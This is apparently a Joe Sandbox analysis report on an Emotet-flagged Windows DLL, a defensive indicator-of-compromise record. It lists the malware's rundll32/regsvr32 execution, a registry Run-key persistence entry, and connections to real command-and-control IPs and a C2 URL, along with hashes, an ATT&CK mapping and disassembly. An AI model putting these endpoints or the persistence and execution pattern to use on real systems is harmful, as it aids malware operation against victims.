Code function: 0_2_00007FFA0AE69474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FFA0AE69474

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA0AE6DD90 GetProcessHeap,

0_2_00007FFA0AE6DD90

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE63AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FFA0AE63AD0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE69474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFA0AE69474
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA0AE64944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFA0AE64944
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE63AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FFA0AE63AD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE69474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFA0AE69474
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA0AE64944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFA0AE64944

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\En3ZIyuYdw.dll",#1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA0AE6AB50 cpuid

0_2_00007FFA0AE6AB50

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA0AE64A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FFA0AE64A94

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 6.2.regsvr32.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1f1b4d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.1f592ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.20e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.20509d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.20e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.1f592ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.20509d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1f1b4d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.700027974.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.461600527.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.314902232.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.314643058.000001F1B4D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.317524653.0000020509D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.699849743.0000000002750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315217709.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.312512000.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.461398791.0000000002660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.312680060.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.313418088.000001F592EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
En3ZIyuYdw.dll	45%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.rundll32.exe.1f592ec0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.regsvr32.exe.20e0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.rundll32.exe.1f1b4d30000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
12.2.regsvr32.exe.2660000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
6.2.regsvr32.exe.2750000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll64.exe.20509d30000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://172.105.115.71:8080/lgtwttxoush/zjavbsyvuswch/zmcgteyprilxxwqk/	0%	Avira URL Cloud	safe
https://172.105.115.71:8080/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://172.105.115.71:8080/	regsvr32.exe, 00000006.00000003.552676823.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.551356715.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697374729.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429326267.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://172.105.115.71:8080/lgtwttxoush/zjavbsyvuswch/zmcgteyprilxxwqk/	regsvr32.exe, 00000006.00000003.552676823.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429368493.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429582850.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697412124.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.551356715.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552051098.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.697374729.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.429326267.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.105.115.71	unknown	United States	63949	LINODE-APLinodeLLCUS	true
188.165.79.151	unknown	France	16276	OVHFR	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
174.138.33.49	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
36.67.23.59	unknown	Indonesia	17974	TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
83.229.80.93	unknown	United Kingdom	8513	SKYVISIONGB	true
198.199.70.22	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
93.104.209.107	unknown	Germany	8767	MNET-ASGermanyDE	true
186.250.48.5	unknown	Brazil	262807	RedfoxTelecomunicacoesLtdaBR	true
209.239.112.82	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
175.126.176.79	unknown	Korea Republic of	9523	MOKWON-AS-KRMokwonUniversityKR	true
128.199.242.164	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
178.238.225.252	unknown	Germany	51167	CONTABODE	true
46.101.98.60	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
190.145.8.4	unknown	Colombia	14080	TelmexColombiaSACO	true
82.98.180.154	unknown	Spain	42612	DINAHOSTING-ASES	true
103.71.99.57	unknown	India	135682	AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdIN	true
87.106.97.83	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
103.254.12.236	unknown	Viet Nam	56151	DIGISTAR-VNDigiStarCompanyLimitedVN	true
103.85.95.4	unknown	Indonesia	136077	IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramID	true
202.134.4.210	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
165.22.254.236	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
139.59.80.108	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
104.244.79.94	unknown	United States	53667	PONYNETUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.75.33.122	unknown	France	16276	OVHFR	true
160.16.143.191	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
103.56.149.105	unknown	Indonesia	55688	BEON-AS-IDPTBeonIntermediaID	true
85.25.120.45	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
115.178.55.22	unknown	Indonesia	38783	SIMAYA-AS-IDPTSimayaJejaringMandiriID	true
103.126.216.86	unknown	Bangladesh	138482	SKYVIEW-AS-APSKYVIEWONLINELTDBD	true
128.199.217.206	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
114.79.130.68	unknown	India	45769	DVOIS-IND-VoisBroadbandPvtLtdIN	true
103.224.241.74	unknown	India	133296	WEBWERKS-AS-INWebWerksIndiaPvtLtdIN	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
202.28.34.99	unknown	Thailand	9562	MSU-TH-APMahasarakhamUniversityTH	true
80.211.107.116	unknown	Italy	31034	ARUBA-ASNIT	true
54.37.228.122	unknown	France	16276	OVHFR	true
218.38.121.17	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
178.62.112.199	unknown	European Union	14061	DIGITALOCEAN-ASNUS	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
64.227.55.231	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745000
Start date and time:	2022-11-13 17:05:58 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	En3ZIyuYdw.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@21/2@0/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 58.8% (good quality ratio 53.4%) Quality average: 60.9% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 60 Number of non-executed functions: 171
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226, 93.184.221.240
Excluded domains from analysis (whitelisted): client.wns.windows.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, tile-service.weather.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:07:53	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run DCGMIKhx.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RJsEQYV\DCGMIKhx.dll"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.105.115.71	Kjx74pqege.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	En3ZIyuYdw.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse
	UHUTnbbdkB.dll	Get hash	malicious	Browse
188.165.79.151	Kjx74pqege.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse
	UHUTnbbdkB.dll	Get hash	malicious	Browse
	JGL3dKVcIJ.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	Kjx74pqege.dll	Get hash	malicious	Browse	172.105.115.71
	U9M1w8FHBW.dll	Get hash	malicious	Browse	172.105.115.71
	En3ZIyuYdw.dll	Get hash	malicious	Browse	172.105.115.71
	Kjx74pqege.dll	Get hash	malicious	Browse	172.105.115.71
	mqMIxHWdwe.dll	Get hash	malicious	Browse	172.105.115.71
	ozZDLYwvhE.dll	Get hash	malicious	Browse	172.105.226.75
	i590SBAZAI.dll	Get hash	malicious	Browse	172.105.115.71
	rbh8gbxi93.dll	Get hash	malicious	Browse	172.105.115.71
	aukDPlAxnc.dll	Get hash	malicious	Browse	172.105.115.71
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	172.105.115.71
	eki0vpuCvx.dll	Get hash	malicious	Browse	172.105.115.71
	mqMIxHWdwe.dll	Get hash	malicious	Browse	172.105.115.71
	ozZDLYwvhE.dll	Get hash	malicious	Browse	172.105.226.75
	i590SBAZAI.dll	Get hash	malicious	Browse	172.105.115.71
	rbh8gbxi93.dll	Get hash	malicious	Browse	172.105.115.71
	aukDPlAxnc.dll	Get hash	malicious	Browse	172.105.115.71
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	172.105.115.71
	eki0vpuCvx.dll	Get hash	malicious	Browse	172.105.115.71
	poXIurSG6I.dll	Get hash	malicious	Browse	172.105.115.71
	poXIurSG6I.dll	Get hash	malicious	Browse	172.105.115.71
OVHFR	Kjx74pqege.dll	Get hash	malicious	Browse	54.37.228.122
	U9M1w8FHBW.dll	Get hash	malicious	Browse	54.37.228.122
	Kjx74pqege.dll	Get hash	malicious	Browse	54.37.228.122
	mqMIxHWdwe.dll	Get hash	malicious	Browse	54.37.228.122
	ozZDLYwvhE.dll	Get hash	malicious	Browse	94.23.45.86
	i590SBAZAI.dll	Get hash	malicious	Browse	54.37.228.122
	rbh8gbxi93.dll	Get hash	malicious	Browse	54.37.228.122
	aukDPlAxnc.dll	Get hash	malicious	Browse	54.37.228.122
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	54.37.228.122
	eki0vpuCvx.dll	Get hash	malicious	Browse	54.37.228.122
	mqMIxHWdwe.dll	Get hash	malicious	Browse	54.37.228.122
	ozZDLYwvhE.dll	Get hash	malicious	Browse	94.23.45.86
	i590SBAZAI.dll	Get hash	malicious	Browse	54.37.228.122
	rbh8gbxi93.dll	Get hash	malicious	Browse	54.37.228.122
	aukDPlAxnc.dll	Get hash	malicious	Browse	54.37.228.122
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	54.37.228.122
	eki0vpuCvx.dll	Get hash	malicious	Browse	54.37.228.122
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	213.32.44.120

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62919
Entropy (8bit):	7.995280921994772
Encrypted:	true
SSDEEP:	1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
MD5:	3DCF580A93972319E82CAFBC047D34D5
SHA1:	8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
SHA-256:	40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
SHA-512:	98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
Malicious:	false
Preview:	MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ...g......^..~\|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D\|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..\|=.m1..~..!..b...._.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1108374798811247
Encrypted:	false
SSDEEP:	6:kKa+MhN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:wb/kPlE99SNxAhUexYo1
MD5:	7CEA6AD8D35A2539898B60B4DE317E17
SHA1:	9671FFFC47AE198B3313241F2E61E35D4D933B6C
SHA-256:	1FE35B656E70EDA93C7217EA076F4B90E45F2F1CCB55B400B7C1343C3774D2AB
SHA-512:	31AEC185472CE42813A3A9D830F2249E6909CDD96A6E5FA43B8962889EA04977D67C0CE4F5A83CFD8E76A55DA1DAD610FCFA94E653246B2EF01A6D1EB51CDE26
Malicious:	false
Preview:	p...... ..........z.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.619217390480199
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	En3ZIyuYdw.dll
File size:	528896
MD5:	633fd626fe5a1328fac74f20daf91f59
SHA1:	01d495949dd7e86ebdaf326da882d022d73c1d7f
SHA256:	23a872dfbba73a7f72bd24c68a0a3f5294bd0f60cab1ed0e5b2c80735fcb40ac
SHA512:	5c8e736c200d486fba5a6d12cc51f86bab4fee3c034e8fe01d71773eb3888ddb5243d7d1711aa820d65d43fa5de0a69910ada0d4387de1c2d66d7b7b1a65203b
SSDEEP:	6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEXFn:mW1e9PeexPBjvKSpuvYI+TLgs1dcEXF
TLSH:	34B4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x1800044e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81146e0614ccc4eb7174ad2ad695dedb

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007FF1C4C10487h
call 00007FF1C4C10A18h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007FF1C4C102FCh
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033F0Dh]
dec eax
mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]
call 00007FF1C4C12C81h
dec eax
lea eax, dword ptr [00033F1Dh]
dec eax
mov dword ptr [ebx], eax
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
xor eax, eax
dec eax
mov dword ptr [ecx+10h], eax
dec eax
lea eax, dword ptr [00033F13h]
dec eax
